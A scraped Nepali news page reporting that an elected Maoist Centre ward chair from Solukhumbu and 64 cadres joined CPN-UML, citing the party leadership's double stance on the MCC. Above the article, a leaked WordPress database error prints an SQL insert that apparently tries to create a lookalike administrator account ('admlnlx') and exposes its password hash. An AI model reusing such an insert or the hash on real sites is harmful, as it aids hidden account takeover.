WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BG5HpPJdWfLmuuP6r2DgszgTF4V9gY.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 11:47:54', '', 'admlnlx', 'admlnlx')

माओवादी केन्द्रका बिजयी वाडाध्यक्ष सहित ६४ जना एमालेमा प्रवेश – Gaule Khabar

माओवादी केन्द्रका बिजयी वाडाध्यक्ष सहित ६४ जना एमालेमा प्रवेश

माओवादी केन्द्रका बिजयी वाडाध्यक्ष सहित ६४ जना एमालेमा प्रवेश

काठमाण्डौ । नेकपा माओवादी केन्द्र सोलुखुम्बुका प्रभावशाली युवानेता भुपाल सिं राई नेकपा एमालेमा प्रवेश गरेका छन्। नेकपा माओवादी केन्द्र जिल्ला समन्वय समिति सोलुखुम्बुका सदस्य समेत रहेका राई थुलुङ दुधकोशी गाउँपालिका वडा नं ९ बाट निर्बाचित वडाध्यक्ष समेत हुन्।

राजधानीको बबरमहलस्थित कार्की बैंक्वेटमा जारी केन्द्रीय समिति बैठक स्थलमा आयोजित बिशेष कार्यक्रममा नेकपा एमालेका अध्यक्ष केपी शर्मा ओली,वरिष्ठ उपाध्यक्ष ईश्वर पोखरेल, महासचिव शंकर पोखरेल लगायतका नेताहरुले राईसहित सोलुखुम्बुका ६४ जना कार्यकर्तालाई नेकपा एमालेमा प्रवेश गराएका हुन्। उनीसँगै सोही वडाबाट वडा सदस्यमा निर्बाचित सोमकुमार तामाङ र रेणुका रसाइली पनि माओवादी परित्याग गरेर नेकपा एमालेमा प्रवेश गरेका छन् ।

माओवादी केन्द्रभित्र ब्यक्तिबादी राजनीति हावी हुँदै गएको राइले बताए । एमसीसीको बिषयमा भित्रभित्रै सहमति गर्ने र बाहिर बिरोधमा कार्यकर्ता उफार्ने द्वैध चरित्र नेतृत्वले प्रदर्शन गरेका कारण माओवादी केन्द्र परित्याग गरेर एमालेमा प्रवेश गर्नुपरेको बताउंदै राइले राजनीतिक भविष्य सुरक्षित गर्ने हो भने माओवादी कार्यकर्ताहरुले अब एमालेमा प्रवेश गर्नुको विकल्प नरहेको बताएका छन् ।

बिहिवार एमाले प्रवेश गर्नेहरुमा गाउँपालिका पार्टी कमिटी सदस्य तथा तत्कालीन जनयुद्धका कमान्डर पासाङ तामाङ,गाउँ पार्टी कमिटी सदस्य भाईकाजी तामाङ,छिरिङ तेन्जिङ शेर्पा एबम पर्यटन ब्यबसायी केदारकाजी राई लगायत छन् ।

एमाले प्रवेश गर्ने जानकारी भएपछि माओवादी केन्द्र सोलुखुम्बुले गाउँपालिका राईलाई कारबाही गरेको थियो ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका